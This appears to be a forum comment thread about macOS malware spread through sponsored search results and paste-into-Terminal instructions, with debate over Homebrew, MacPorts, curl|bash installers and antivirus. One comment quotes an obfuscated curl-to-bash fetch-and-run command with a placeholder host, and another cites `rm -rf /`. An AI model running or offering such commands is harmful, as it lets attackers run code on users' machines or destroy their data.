At the very least, replace homebrew with something like devbox which has `devbox global` for globally managing packages, it uses nix under the hood, and it's probably the simplest most direct replacement for homebrew.
I don't agree this is an issue and I'll tell you why: Homebrew isn't responsible for keeping the system functional like apt or pacman, it's a supplemental thing. I've also found it's useful in this capacity on Linux specifically with LTS distros, I can get the latest fzf or zoxide or whatever without having to add some shady repo.
This is how I see/use brew as well, and being able to just blow the directory away anytime and start over if need be is nice.
It's not a "system" package manager, nor was it ever meant to be. Its supplemental. I've also found it valuable on the various immutable linux distros.
I use MacPorts because of older versions of Homebrew having a weird and insecure design. [1] I think some of those design issues may have been fixed, but I’m wary of Homebrew.
[1]: https://saagarjha.com/blog/2019/04/26/thoughts-on-macos-pack...
It's not necessary because Mac applications shouldn't have any dependencies other than the OS. (Whatever additional libraries they use should be included.) This should also be true of basic developer tools. Once you're in a particular ecosystem, tools like deno, npm, or uv can handle their own dependencies.
Alternatively, you could do development in a container and use apt-get there. That's probably safest now that we're using coding agents.
I wish the mac users would switch to a real OS, linux, so that software companies would release linux versions of stuff first.
Codex, Claude Desktop, etc etc all starting out as "macOS exclusive" feels so silly when they're targeting programmers. Linux is the only OS a programmer can actually patch and contribute to, and yet somehow we've got a huge number of developers who don't care about having a good package manager, don't care about being able to modify their kernel, don't care about their freedom to access and edit the code of the software they rely on to work...
It's depressing how much of the software industry is just people on macbooks using homebrew to install a newer version of bash and paying $5 for "magnet" to snap windows to the corners since their OS holds them in a prison where they can't simply build themselves a tiling window manager in a weekend.
The OS is core to your tools and workflows, and using macOS cedes your right to understand, edit, and improve your OS and workflows to a company that is actively hostile to open source, and more and more hostile to users (with a significant increase in ads and overly priced paid services over the years).
Anyway, yeah, homebrew sucks. At least nix works on macOS now so there's an okay package manager there, but frankly support for macOS has been a huge drag of resources on the nix ecosystem, and I wish macOS would die off in the programming ecosystem so nix could ditch it.
I harbor similar sentiments, but I understand why OpenAI, Anthropic, Zed, etc begin with a macOS version. They're able to target a platform which is a known quantity and a good jumping off point to Linux.
I'm writing software for Linux myself and I know that you run into weird edge case windowing / graphical bugs based on environment. People are reasonably running either x11 or wayland (ecosystem is still in flux in transition) against environments like Gnome, KDE, Sway, Niri, xfce, Cinnamon, labwc, hyprland, mate, budgie, lxqt, cosmic... not to mention the different packaging ecosystem.
I don't blame companies, it seems more sane to begin with a limited scope of macOS.
The problem is that right now I have to choose the lesser of 2 evils. I hate what W11 has become. I only use it for games at the moment and the only reason is that some games Apex/BF6 do not run under proton because of their anticheat.
And I also hate what modern Macos is heading towards. I'm still ignoring/canceling the update on both my devices for the new "glass" interface.
And a thinkpad running Linux is just not doing it for me. I want my power efficient mac hardware.
Truth be told I just want to have my mbp running Linux. But right now it's not yet where it needs to be and I am most certainly not smart enough to help build it :(
> And a thinkpad running Linux is just not doing it for me. I want my power efficient mac hardware.
I'm using a decade old thinkpad running linux and it is definitely 'doing it for me'. And I'm not exactly a light user. Power efficient mac hardware should be weighed against convenience and price. The developer eco-system on Linux is lightyears ahead of the apple one, I don't understand why developers still use either Windows or the Mac because I always see them struggle with the simplest things that on Linux you don't even realize could be a problem.
Other OSs feel like you're always in some kind of jailbreak mode working around artificial restrictions. But sure, it looks snazzy, compared to my chipped battle ax.
> And a thinkpad running Linux is just not doing it for me. I want my power efficient mac hardware.
Are you talking about the battery? I bought a T16 AMD a month ago with the 86Wh battery and it lasts between 8 and 12 hour depending on the usage. Not as much as a macbook but enough to not worry too much about it. New intel ones are supposed to be much better on power efficiency.
It's off course one level bellow on the mac on that regard (and others maybe too), but if you want to use linux I think the trade-off is worth it.
It's Apple, not the users, that need to make that switch in the first instance. I'd love to use Linux again but I'm not leaving Apple hardware for it, or accepting poor software support for recent hardware.
It's a question of priorities, I guess.
I admit I love the mbp hardware, but I can't stand macos anymore. So when my work computer was up for replacement, I didn't think twice and went with a PC, the latest thinkpad p14s. Everything works out of the box on Linux.
Is it as nice as a mac? No, especially the plastic case doesn't feel as nice under the hands as a mac's aluminum, the touchpad is quite good but worse than a mac's, and there are some gaps around the display hinge. But the display itself is quite nice (similar resolution, oled, although not as bright as a mac's), it's silent and it's plenty fast for what I do. I didn't pay for it, so I don't directly care about this point in this situation, but it also cost around half of what an equivalent mbp would have cost.
I also haven't tried the battery life yet, but it should hold at least as well as my 5-yo hp elitebook, which still held for around 5 hours last year. I basically never use it for more than an hour unplugged, so battery life is low on my priorities.
I dunno, I'm pretty happy with my thinkpad. Even if I could run Linux flawless on a macbook (which you can't unfortunately) I'd still take the thinkpad hardware over a macbook.
A macbook air is 1.25kg, and my thinkpad is 910g, and I can really feel that difference. The thinkpad keyboard also feels ever so slightly better too... and Linux working well is worth more than pretty much anything else.
>but I'm not leaving Apple hardware for it,
It's ok, Apple knows this and will lock it's OS down to an iPhone like OS step by step until you're boxed in a nice little prison, and you'll accept it.
Also you'll pay them 30% on every transaction you do on said computer.
I'd say support for linux has improved an incredible amount compared to 5-10 years ago. I'm often pleasantly surprised when ever a linux version of something is available because I'm used to not expecting that haha.
Tell me which OS you’re using that allows you to code your own viable tiling manager in a weekend?
Is it really a sin to pay for software to augment your OS? Like programmers make their living selling that and it’s horrible?
MacPorts has existed since 2002 and was invented by Jordan Hubbard, who created the original FreeBSD ports system and was also employed on Apple's UNIX team.
The package management story on Linux is hideously bad. The next generation replacements are all over the place (do I use snaps? Flatpak?). No one is going to learn Nix if it means you need to become a programmer just to install something.
The graphics story on Linux also sucks. I recently tried to convert my Windows gaming machine to Linux (because I hate W11 with a burning passion). It does work, but it’s incredibly painful. Wayland, fractional scaling, 120+ Hz, HDR. It’s getting better thanks to all the work Valve etc are putting in, but it’s still a janky messy patchwork.
MacOS just works. It works reliably. Installing things is easy. Playing games is easy. I’m able to customize and configure enough for my needs. I love it and I hope it sticks around because there is no way in hell I would move my work machines over to Linux full time.
> Wayland, fractional scaling, 120+ Hz, HDR
What's wrong with those? I don't have a single screen which does 120 Hz + HDR, but I'm typing this on a 120 Hz laptop, with variable refresh rate, at 125% scaling, and everything works great with Plasma (haven't tried anything else). I also have an external HDR screen, but it only does 60 Hz. It works great, too, doing HDR on it but not on the laptop screen (running at the same time, of course). They also run at different scaling (125% and 100%).
Now I don't know how to confirm that VRR is actually doing anything, but I can tell there's a difference between setting the monitor to 60 and to 120 Hz. HDR on the other screen also produces a clear difference.
This is all running from integrated intel graphics, maybe with other GPUs it's more of a crapshoot, no idea.
Huh? Homebrew supports and frequently uses dependencies between formulae. It’s a bit janky around upgrades in my experience, but you’re going to have to clarify what you mean.
I never use it when I can have my way.
The UNIX in macOS is good enough for my needs, and I manually install anything extra that I might require.
MacPorts was created by the creator of the original FreeBSD ports system who was also an Apple employee. It ought to be everyone's first choice for package management on macOS.
That wouldn't really help, it could be more naughty and use pastejacking so you don't even realize what's happening. That might end up catching a lot of people because as far as i know by default bash doesn't use bracketed paste, so you think you're copying a real command and it ends up sending your secrets before you know what happened.
Disabling JS + bracketed paste seems to be the only good solution.
Btw OP article uses a weird setup, why would they use `bash -c "$(curl $(echo qux | base64))"` instead of just "curl | bash"
Homebrew also installs through curl | bash but since recent they also offer a .pkg installer.
It's not really any different than downloading a binary from a website, which we've been doing for 30 years. Ultimately, it all comes down to trusting the source.
>> Attacks like this are not helped by the increasingly-common "curl | bash" installation instructions ...
> It's not really any different than downloading a binary from a website, which we've been doing for 30 years.
The two are very different, even though some ecosystems (such as PHP) have used the "curl | bash" idiom for about the same amount of time. Specifically, binary downloads from reputable sites have separately published hashes (MD5, SHA, etc.) to confirm what is being retrieved along with other mechanisms to certify the source of the binaries.
If the attacker already controls the download link and has a valid https certificate, can't they just modify the published hash as well?
Which is the reason why it's better to actually cryptographically sign the packages, and put a key in some trusted keystore, where it can actually be verified to belong to the real distributor, as well as proving that the key hasn't been changed in X amount of days/months/years.
Still doesn't address the fact that keys can be stolen, people can be tricked, and the gigantic all-consuming issue of people just being too lazy to go through with verifying anything in the first place. (Which is sadly not really a thing you can blame people for, it takes up time for no easily directly discernable reason other than the vague feeling of security, and I myself have done it many more times than I would like to admit...)
Which is why package managers with well-maintained repositories are the civilized solution to software disruption. Unfortunately the Linux world has been dedicating a lot of energy to making Windows-style "download and run the exe" possible on Linux.
>Which is why package managers with well-maintained repositories are the civilized solution to software disruption.
How does that model work with distros like debian, where they freeze package versions and you might not get claude code until 2027 (or whenever the next release is)?
Sounds like you either shouldn't use Debian or should find a repo with maintainers who align with your preferred style of package inclusion.
In principle you could even make such a repository, or otherwise promote one.
If the debian maintainers don't align with your preferences you can:
1. Create your own apt repository with newer software, and install from that. It's easy to package things, you can share the repository with trusted friends, running linux with friends is fun.
2. You can switch to a distro, like NixOS or Arch, which values up-to-date software more than slow stable updates.
Debian does seem to be more aligned with mailservers and such, where updates can be slow and thoughtful, not as much with personal ai development boxes where you want the hot new ai tool of the week available asap.
... Either way, learning to package software correctly for your distro of choice is a good idea, it's fun to bang out a nix expression or debian package when you need to install something that's not available yet.
And installing a .deb package is equivalent to executing arbitrary code as root so I'm not sure what this actually buys you in security terms.
I would love for folks to start packaging their software for major distros if for no other reason than to see just how annoying the tooling is to use.
I've heard this time and time again from new Linux users: "I don't want to learn the command line, I just want to be able to install and run whatever I want"
You don't need command line for installing packages, though
Doesn't matter, they'll need to use it eventually for something, freak out, and go back to windows.
On Mac binaries need to be signed and notarized and Apple could stop the spread of the malware once it's identified or even detect it before notarizing it.
I've downloaded and installed too many packages where the developers didn't bother with this, but I uncritically went to Mac's security settings to let it do its thing anyway.
I don't know if developer utilities can be distributed through the app store, but they should be so that Apple can review them properly. Criticisms aside, the iOS App Store and the iOS security model has been the best thing for software security (especially for lay-people), ever.
Apple controlling CLI utilities is a bad supposedly good idea.
They can’t stop themselves from tightening their grip ever tighter, and always want to ensure you have no functionality above what they deemed sufficient.
Apple taking over Homebrew would be a disaster.
What's the security benefits of using homebrew? Isn't it just another layer of redirection before downloading the software?
There are some real differences.
All the homebrew packages have checksums and are versioned in git, so if the upstream website is compromised and a malware installer is put in place of the package, `curl | bash` will just install the malware, while `brew` would start erroring out and refuse to install after downloading something with a different checksum.
You also get an audit log in the form of the git repo, and you also ensure everyone's downloading the same file, since `curl | bash` could serve different scripts to different IPs or user-agents.
I don't think brew does proper build sandboxing, so like `./configure.sh` could still download some random thing from the internet that could change, so it's only a bit better.
If you want proper sandboxing and thus even more security, consider nix.
A civilized person of course would use either MacPorts or a proper native macOS installer package.
Civilization is about cooperating with your fellow man to build great things, not bowing to the feudal lord Apple Inc.
A truly civilized person would use Linux, OpenBSD, etc, a free operating system where they may contribute fixes for their fellow man without having to beg at the boots of the single richest company on the planet with radar numbers asking for fixes from on high.
Apple are just number two, half a trillion behind nVidia. Hopefully that’ll soon change when the bubble pops.
A homebrew tap is really a lateral move from a safety perspective and still usually invoked by pasting into the command line.
And donate to Homebrew, like a civilised person
Maybe tools like https://github.com/vet-run/vet could help with these projects that would rather you use their custom install script instead of complying to distro-specific supply chains.
Meanwhile, homebrew install instructions:
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/inst...)"
Then it prompts user for admin previledges. Also, it does not support installing as a local non-admin user.
I would agree if it was the only way to install Homebrew, but it is not.
You can install it via a .pkg here: [0]
[0] https://github.com/Homebrew/brew/releases/tag/5.0.13
MacPorts, of course, features an actual .pkg installer, as well as doing pretty much everything else better, and having more packages, and existing first.
I use brew but willing to try out Macports. How come the package install instructions seem to require sudo under macports? Does that not carry more risk during the install ?
Does it still do the "you can't install via sudo, that's a security risk" while not allowing a non-admin install? I laugh and I cry.
Why does anyone trust that project to understand security?
As if homebrew is any more secure. The only reason to use homebrew is convenience.
I agree about the proliferance of curl | bash, but homebrew is not the answer.
They cut support for old platforms way to fast and just in essence try to dictate far too much.
> Never follow a shortened link without expanding it using a utility like Link Unshortener from the App Store,
I am unfamiliar with the Apple ecosystem, but is there anything special about this specific app that makes it trustworthy (e.g: reputable dev, made by Apple, etc.)? Looking it up, it seems like an $8 app for a link unshortener app.
In any case, there have been malicious sites that return different results based on the headers (e.g: user agent. If it is downloaded via a user-agent of a web browser, return a benign script, if it is curl, return the malicious script). But I suppose this wouldn't be a problem if you directly inspect and use the unshortened link.
> Terminal isn’t intended to be a place for the innocent to paste obfuscated commands
Tale as old as time. Isn't there an attack that was starting to get popular last year on Windows of a "captcha" asking you to hit Super + R, and pasting a command to "verify" your captcha? But I suppose this type of attack has been going on for a long, long, time. I remember Facebook and some other websites used to have a big warning in the developer console, asking not to paste scripts users found online there, as they are likely scams and will not do what they claim the script would do.
---
Side-Note: Is the layout of the website confusing for anyone else? Without borders on the image, (and the image being the same width of the paragraph text) it seemed like part of the page, and I found myself trying to select text on the image, and briefly wondering why I could not do so. Turning on my Dark Reader extension helped a little bit, since the screenshots were on a white background, but it still felt a bit jarring.
DO NOT GOOGLE EXPRESS VPN!
The GitHub links are one of the nastiest Malware I ever encountered in my life!
I steals your Apple Keychain, all your "Safe" Passkeys, your Google Chrome "Saved Passwords", even your KeePass Database!
Login and security is still not sufficiently solved with attack-proofs for the most important things in life like your Bank, Email, Wallets, Social Logins.
Your "logged-in Sessions" also get stolen! It's unbearable that most cookies expire in months "ON THE SERVER SIDE"! You have no control and can't log the attacker out!
It happened to me, when I was in China and searched for ExpressVPN, because the main website didn't load forever, the GitHub link seemed like an alternative.. damn.. I changed my Google Password 5 times and the attacker was still able to log-in, it was so devastating! I had to change my email passwords multiple times too.
Sessions are what make logins valid and this is the weakest link of all. I wish Sessions used Off-The-Record encryption with One-Time-Pads, such that each acccess requires a new key, that can only be derived with a valid reply that makes safe that the attacker can be logged out safely.
You have to consider your machine and all others you connected to to be compromised. Time to reinstall every device with new accounts and passwords. With unused usb sticks and images downloaded from another network you were never connected to.
Did you download anything? A bad link isn't going to do all of that, unless some NS actor is dropping zero days on random people via Google search. You most likely downloaded a trojan with a a luma stealer, and your computer is probably still compromised.
This is very close to something that happened to a friend of mine. They were trying to follow a MoltBot installation guide, but clicked on a different link that looked legitimate. That page instructed them to paste a command into Terminal. After running it, macOS immediately started asking for multiple permissions, which in hindsight was the big warning sign. But for someone who is non technical might have ran with it.
> After running it, macOS immediately started asking for multiple permissions, which in hindsight was the big warning sign.
From what understand of MoltBot, I would expect it to ask for a lot of permissions. I guess maybe they are prompted closer to configuration time in the actual app.
Yeah they are both acting as a RAT essentially. Just one is in your control and one isn’t.
This might sound stupid, but I have my own index, of trusted domains:
https://github.com/rumca-js/Internet-Places-Database
I start with it, to find stuff I know. If there is stuff I don't know and is important to me, I add it to my database.
Also it enforces me to verify each link I visit. So links I visit are mostly ok.
Though I sometimes use chatgpt for instructions, and if someone poinsed the well "well enough" it might spread malware.
this curl | shell installation is actually insane. It was insane 10 years ago and it is going to be insane 10 years from now. Do not do it.
I imagine that an AI agent like OpenClaw, if given browser access and system control with Peekaboo or similar could easily fall prey to this attack.
GitHub too https://iboostup.com/blog/ai-fake-repositories-github
Google falling from grace. What happened to it? Google Search used to be useful in the past.
Hasn't AdSense been known to be a malware delivery vector for over a decade by now?
https://www.securityweek.com/malvertising-campaign-abuses-go...
Money. This is all thanks to AdSense.
Confirmed. The professional term is "enshittification". Nowadays, I just use https://altpower.app
At least macos has file access permissions.
You're referring to [Sandboxing] Mandatory Access Controls [0]. Windows doesn't implement MAC in the same way, instead using Mandatory Integrity Controls [1].
[0] https://developer.apple.com/library/archive/documentation/Se...
[1] https://learn.microsoft.com/en-us/windows/win32/secauthz/man...
Windows implements ACLs in a far more granular way than macOS and most other Unicies, however (with the exception of Slowaris).
Windows can implement these things as much as they like, but if you paste a command into CMD.exe, it can access your files with no popup like MacOS gives you.
Yes, same thing will happen on macOS.
Comparing to DOS or what? No one runs Win10/11 on FAT now, while NTFS has access permissions and ACLs.
I remember that Win32 apps on Windows 10 and 11 can do whatever they want with the users personal files. Has that changed?
In Win, access to files are controlled by ACL when NTFS is used (dating back to NT 3.1 with NTFS). So it depends on which user runs a process.
Basic hygiene is very simple: never run as Administrator. Create and use a regular user or poweruser group user. It's similar to a regular linux practice. Use Administrator account when needed only.
GP is talking about isolation inside the current user. Recent macOS versions ask before allowing a program to access files inside Documents, Desktop, etc. Whether that helps or not is debatable, but it’s not quite the same as what Windows ACLs do out of the box. To achieve the same on Windows, one would have to run the program as a different user to which they’d selectively grant access to the folders inside their profile.
You can enable controlled folders on Windows: https://learn.microsoft.com/en-us/defender-endpoint/controll...
It's not enabled by default, though. Enabling it by default would probably break just about every Windows program out there and like UAC on Vista, everyone would turn it off immediately.
You can create a separate user, but even a user in the administrators group doesn't have an admin token until elevation.
If you trust yourself to not blindly click OK on every UAC prompt, a single user account in the admin group is fine.
> never run as Administrator.
Computer asks for password. I type in password.
Admin access prompts are honestly a joke even on macOS. The source is completely opaque.
Win32 Apps can access anything you can access and also read out some text fields from apps you have running, via accessibility APIs.
https://learn.microsoft.com/en-us/defender-endpoint/enable-c...
What does that even mean? NTFS file access permissions (35 years old at this point) are far more powerful than 1970s-era Unix permissions model.
It's referring to the fact that Terminal doesn't have free access to all your files and folders, despite what the traditional file access perms say.
Windows has this too, but it's off by default. I forgot what it's called, that's how often it gets used.
He’s talking about sandboxing and permissions prompts
I reported one of these recently. It was also related to clearing space, specifically system files. It was the second top sponsored link and presented as an Apple support page. The styling was very convincing, with the only giveaway being the url.
A day later my parents called me very stressed out about a popup on my mother’s iPhone saying she had been hacked. I asked them to take a screenshot, and again it was a website that was styled to look like a modal on top of a iOS Settings app page. With the new ui this was extremely effective, as the page title is just a tiny thing down the bottom in scrolled state.
I don’t know what is going on, but I’d assume the problem is AI moderation.
Are we still pushing the myth that anti-malware on Mac isn't necessary?
I support quite a few Mac users and never recommend it myself. Also own a couple Mac’s and don’t use it.
I do occasionally use an app to clean somebody’s Mac of an irritating browser search hijack. I’ve never seen anything else.
Why should I change my mind?
How does antivirus software protect users who paste malicious commands they find online into the terminal?
By scanning downloaded binaries for known viruses?
A text command pasted into the terminal isn't a binary.
Convincing a Linux user to paste rm -rf / into the terminal is not malware. It's social engineering.
Scanning binaries for known malware is already built into the OS.
Endpoint security software on the Mac, if it's worth the hit to system resources that is, inspect every call to exec and fork that occur in the kernel and also inspect those for known attack vectors, malicious scripts, etc. The one I have installed on my work Mac will kill reverse shell attempts before they are run. Will stop keychain attacks. Infostealing (as they can also get every file system op as they are happening in the kernel).
Gatekeeper and Xprotect are good, but there's only so much they can do.
Which do you use/recommend?
Antivirus programs will run on PowerShell scripts, VBScript files, JScript files, and all other kinds of automation on Windows.
The screenshots from the article clearly show a permission prompt for a program. Whether that's a binary or a shell script or something else doesn't matter, the infection stage should've been caught by anti malware rather than permission prompts.
Windows Defender does this already. If Apple's AV can't catch this, I think they may be relying on their DRM-as-a-security-measure (signatures, notarisation, etc.) a bit too much.
> Scanning binaries for known malware is already built into the OS.
Clearly it isn't. XProtect is a joke. It's 2004-era ClamAV level of protection.
The article specifically mentions that the methodology here is to trick users into running an obfuscated CLI command…that downloads and runs a binary
Terminal commands have the ability to do dangerous things, like deleting all the user's files.
In this case, the user is warned that the command wants to do something dangerous and must manually allow or deny the action.
No, that narrative died around 2010. The existence of malware targeting Macs has driven many macOS security improvements since, many of which are taken personally by HN readers.
As of today you don't need to install one on Windows also. Both OS have inbuilt s/w for this purpose.
XProtect (Apple's built-in antimalware) is usually all you need, as long as you're at least somewhat savvy (and sometimes even if you aren't). I believe installing any additional antimalware on a Mac is a waste of resources.
No, we're using the built-in mac anti-malware app
It is necessary. That’s why Apple ships a free invisible one bundled into the OS that you never have to think about, see, or update.
a docs entry point - https://support.apple.com/en-mide/guide/security/sec469d47bd...
What anti-malware would have stopped this, exactly?
It seems most anti-malware is the equivalent of the TSA - security theatre that wastes your time and attention, catching plenty of water bottles but not the real stuff.
We should not outsource security to Google.
If you prepare a ligit-looking web page where you instruct people to download and run malware, we'd better learn more on security and caution before blindly follow those directions.
Why should it be Google's (or Bing's) duty to filter those out?
Why should Google be responsible for content they accept money to promote on their website, and then elect to disguise as "natural" search results specifically in order to trick you into clicking them without realizing they're ads?
The answers are in the question.
> Why should it be Google's (or Bing's) duty to filter those out?
Google intentionally disguises ads as search results, and even lets advertisers present a fake URL. When the system's purpose is to profit from tricking inattentive users, I think they should take on some liability for the outcome of what they're tricking people into doing.
Not to say that better teaching security isn't also a good idea.
True, but Google shouldn't be allowing obvious malware advertisements on their platform.
It may not be their duty to filter it out, but it should definitely be their duty to not take money to bump it to the top of their results. Let the algorithm dump random unlinked medium posts on the 5th page where they belong
What is an 'AMOS stealer'?
https://www.malwarebytes.com/blog/detections/osx-atomicsteal...
Actually… I think this be solved by AI answers. I don’t look up commands on random websites, instead I ask an LLM for that kind of stuff. At the very least, check your commands with an LLMs.
What we used to have, 15 years ago, was a really well functioning google. You could be lazy with your queries and still find what you wanted in the first two or three hits. Sometimes it was eerily accurate and figuring out what you were actually searching for. Modern google is just not there even with AI answers which is supposed to be infinitely better at natural language processing.
15 years ago there were fewer content farms trying to get your clicks.
I think that played a somewhat smaller role than Google seemingly gradually starting to take its position for granted and so everything became more focused on revenue generation and less focused on providing the highest quality experiences or results.
Beyond result quality it's absurd that it took LLMs to get meaningful natural language search. Google could have been working on that for many years, even if in a comparably simple manner, but seemingly never even bothered to try, even though that was always obviously going to be the next big step in search.
Google could afford to manually exclude the content farms if they didn't morph from a search company to an advertising company.
Google was such a revelation after the misery of Alta Vista and kin. I miss the days when I liked them.
We used to have an endless supply of new search engines, so "SEO" was not viable. Then Google got a monopoly on search, DoubleClick reverse-acquired Google, and here we are.
Yesterday I was debugging why on Windows, my Wifi would randomly disconnect every couple hours (whereas it worked on Linux). Claude decided it was a driver issue, and proceeded to download a driver update off a completely random website and told me to execute it.
My point is, this is not solved by AI answers.
Claude didn’t simply “proceed to download a driver update off a completely random website and told me to execute it”
You had to disable permissions or approve some of that.
Don’t the LLMs get their information from these random websites? They don’t know what is good and what is malware. Most of the time when I get an AI answer with a command in it, there is a reference to a random reddit post, or something similar.
LLMs will allow Mal to sneak in backdoors in the dataset. Most of the popular LLMs use some kind of blacklisting instead of a smaller specific/specialised dataset. The latter seems more akin to whitelisting.
FTFA: “This is almost identical to the previous attack via ChatGPT.”
Could the dataset of the LLMs that made these recommendations have been poisoned by, let's say, a Honeypot website specifically designed to cause any LLM that trains on it to recommend malware?
Thanks for reminding me to turn off Full Disk Access for Terminal. I'm not sure why I had that one turned on.
Probably because you can’t even properly `ls` system directories without it.
depends which directories…
What would you do in the terminal without it?
I was able to install homebrew, install yt-dlp and download some movies to watch during a flight. All without full disk access.
I was also able to use sudo to remove /opt/homebrew afterwards.
Because it is useless without?
lol, is this serious? The final straw with Mac for me was when I accidentally hit “No” when asked if I wanted to give my terminal access to the file system. All of a sudden I was starting my work day without a working terminal. Obviously there was a solution, probably an easy one, but I didn’t even look for it.
> The final straw with Mac
> Obviously there was a solution, probably an easy one, but I didn’t even look for it
It's hard to take this seriously. It's the most obvious setting possible. Settings > Privacy & Security > Full Disk Access > tick the apps you want to have it.
What's even the complaint here? That Mac has solid app permissions, but you can't be bothered to open the settings?
I said it was likely an easy solution. Glad to see my intuition was correct!
I also said it was the “final straw”. No worries at all if you’re not familiar with that expression. It means that there were lots of similar slights previously, and that the event I mentioned, while minor, was the one that finally pushed me to make the decision I made.
> No worries at all if you’re not familiar with that expression.
I'm not contesting that it was the final straw, I'm contesting it was a straw at all. "I want to change a setting but am too lazy to open the settings" is not an argument against Macs, it's a piece of evidence that you don't know how to operate a computer.
> I also said it was the “final straw”. No worries at all if you’re not familiar with that expression. It means that there were lots of similar slights previously, and that the event I mentioned, while minor, was the one that finally pushed me to make the decision I made.
This sort of patronizing assholery is childish and unbecoming. Your comment would've been better without it.
My comment wouldn't exist without it.
> you can't be bothered to open the settings?
This kind of crap ticks me off and makes me respond in kind. I should be better, sure, but sometimes I'm not.
The solution is to enable Full Disk Access in settings.
Are you sure? This felt like it was specific to iTerm. Like I’d have to scroll a list of apps, find it, and modify what it’s allowed to access.
Careful out there.
Another reason to avoid Medium like cold grits.
This sucks because the web should be the perfect, safe platform for this kind of application, but it isn't. Technically all the features exist in the browser such that you could write a homedir cleaner, space analyzer, etc purely in a browser tab, but because of the misguided (in my opinion) way that browsers refuse to do open a homedir, it's impossible.
I'm not sure letting a webapp access your home is a good idea. You're basically YOLOing random remote code to run on your machine. Maybe we can have it access some specific folder for its own data.
And then there's also Apple which won't allow functional web apps, lest it affects their app store 30% cut.
Seems like a great idea for something to just run inside a chroot jail (or the modern equivalent, a container).
The web already has these APIs, it can be granted read-only permissions to designated directories. But the browsers will refuse to allow you to delegate even read-only access to, for example, the macos ~/Applications folder, on the pretty shaky basis of it being "system files". Because of that policy the API is not useful for the application of a space analyzer.
> browsers will refuse to allow you to delegate even read-only access to, for example, the macos ~/Applications folder, on the pretty shaky basis of it being "system files"
If you want to trash your system I believe nothing prevents you from giving Firefox full-disk access.
Is this satire?
A solution would be to stop shipping macs with the terminal app\s. Computers are now used by a wide variety of people, some without technical knowledge, maybe a default switch on macOS that displays warnings on rather trivial attacks would help.
Well it's becoming developer hostile enough already. Maybe drop python and all command line tools while they're at it.
Would do wonders for that mythical year of the linux desktop...
How is that a solution? These attacks would just tell you to install terminal if you don't already have it.
That would help a little no?